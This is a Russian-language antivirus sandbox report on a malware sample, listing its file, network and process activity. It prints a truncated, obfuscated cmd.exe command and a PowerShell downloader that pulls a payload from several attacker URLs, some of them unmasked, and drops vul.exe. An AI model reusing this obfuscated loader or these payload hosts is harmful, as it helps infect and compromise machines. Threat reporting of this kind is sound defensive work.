Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c %cOMMoNPRoGRaMw6432:~ -12, 1%^mD; ;; ; /v^: ; ;; /r " ; ; ; (^s^Et ^ ^ ^Qh=qE^ Jn ^7Z^ rR^ ^Mv F0 RL^ bK^ yu ^fM^ hc^ nd^ 6x^ ^gr^ Mr S^i ^Dx^ ^zM}^uD^}i0{Nyh^8Vc^hBt61^a^6LcCP}5vkEW^...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\vul.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://ch####ibicycles.it/kkKMa
- http://ec###purghi.it/43RaWCLb
- http://in###las.com/oANp
UDP
- DNS ASK ch####ibicycles.it
- DNS ASK ec###purghi.it
- DNS ASK ha###nessmag.ru
- DNS ASK di#####-distortia.com
- DNS ASK in###las.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c %cOMMoNPRoGRaMw6432:~ -12, 1%^mD; ;; ; /v^: ; ;; /r " ; ; ; (^s^Et ^ ^ ^Qh=qE^ Jn ^7Z^ rR^ ^Mv F0 RL^ bK^ yu ^fM^ hc^ nd^ 6x^ ^gr^ Mr S^i ^Dx^ ^zM}^uD^}i0{Nyh^8Vc^hBt61^a^6LcCP}5vkEW^...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' ; ;; ; /v: ; ;; /r " ; ; ; (^s^Et ^ ^ ^Qh=qE^ Jn ^7Z^ rR^ ^Mv F0 RL^ bK^ yu ^fM^ hc^ nd^ 6x^ ^gr^ Mr S^i ^Dx^ ^zM}^uD^}i0{Nyh^8Vc^hBt61^a^6LcCP}5vkEW^a^lH^e^McrzJb^QV;oMoyCN6^4N^bK^$1W ^...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $tdB='TQz';$pko='http://ch####ibicycles.it/kkKMa@http://eco-spurghi.it/43RaWCLb@http://happinessmag.ru/mt4to008@http://digital-distortia.com/VgUi9W3@http://inarplas.com/oANp'.Split('@');$NNo=([...
